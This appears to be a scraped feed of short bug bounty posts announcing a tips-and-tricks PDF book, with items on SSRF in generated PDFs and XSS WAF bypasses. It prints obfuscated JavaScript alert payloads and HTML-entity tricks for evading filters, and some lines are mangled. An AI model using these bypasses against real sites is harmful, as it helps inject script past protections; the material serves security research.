2 months, 3 weeks ago
Making Plan of my PDF Book

Bug Bounty Tips and Tricks Vol. 1

3 months ago
I have decided to collect all …

I have decided to collect all my bug bounty tips and tricks into PDF book.

Work in progress… ⚙️


4 months ago
4 months ago
SSRF in generated PDFs
4 months, 1 week ago
Bypass XSS WAF protection using invisible separators before or after function name


4 months, 1 week ago
4 months, 1 week ago
4 months, 1 week ago

parent[/al/.source+/ert/.source](1) parent[/al/.source.concat(/ert/.source)](2)

4 months, 1 week ago
Bug Bounty Tip

XSS WAF Bypass by multi-char HTML entities

fj translates to fj
>⃒ translates to > + [?]
<⃒ translates to < + [?]

[?] - Unicode symbol


4 months, 1 week ago
- (function(x){this[x+`ert`](1)})`al`

- (function(x){thisx+ert})al
- windowal+/e/[ex+ec]e+rt
- document['default'+'View']\u0061lert


